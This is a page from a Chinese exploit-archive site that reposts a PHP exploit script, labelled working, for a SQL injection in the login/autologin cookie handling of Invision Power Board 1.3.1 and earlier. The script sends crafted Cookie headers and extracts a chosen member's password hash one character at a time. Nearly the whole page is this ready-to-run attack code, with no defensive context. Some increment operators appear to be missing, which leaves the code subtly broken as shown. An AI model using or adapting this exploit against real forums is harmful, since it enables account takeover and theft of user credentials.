首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

Invision Power Board <= 1.3.1 Login.PHP SQL Injection (working)


http://www.gipsky.com/
<?php

/*

<= 1.3.1 Final

/str0ke

*/



$server = "SERVER";

$port = 80;

$file = "PATH";



$target = 81;



/* User id and password used to fake-logon are not important. '10' is a

random number. */

$id = 10;

$pass = "";



$hex = "0123456789abcdef";

for($i = 1; $i <= 32; $i ) {

$idx = 0;

$found = false;



while( !($found) ) {

$letter = substr($hex, $idx, 1);



/* %27 translates to ', which gets past magic quotes.

This is translated to ' by urldecode. */

$cookie =

"member_id=$id;pass_hash=$pass%27 OR id=$target";

$cookie .=

" HAVING id=$target AND MID(`password`,$i,1)=%27" . $letter;



/* Query is in effect: SELECT * FROM ibf_members

WHERE id=$id AND password='$pass' OR

id=$target

HAVING id=$target AND

MID(`password`,$i,1)='$letter' */



$header = getHeader($server, $port, $file .

"index.php?act=Login&CODE=autologin", $cookie);

if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',

$header) ) {

echo $i . ": " . $letter . "\n";

$found = true;



$hash .= $letter;

} else {

$idx ;

}

}

}



echo "\n\nFinal Hash: $hash\n";



function getHeader($server, $port, $file, $cookie) {

$ip = gethostbyname($server);

$fp = fsockopen($ip, $port);



if (!$fp) {

return "Unknown";

} else {

$com = "HEAD $file HTTP/1.1\r\n";

$com .= "Host: $server:$port\r\n";

$com .= "Cookie: $cookie\r\n";

$com .= "Connection: close\r\n";

$com .= "\r\n";



fputs($fp, $com);



do {

$header.= fread($fp, 512);

} while( !preg_match('/\r\n\r\n$/',$header) );

}



return $header;

}

?>

[2005-06-08]
<< IPSwitch IMAP Server LOGON Remote Stack Overflow Tcpdump bgp_update_print Remote Denial of Service Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8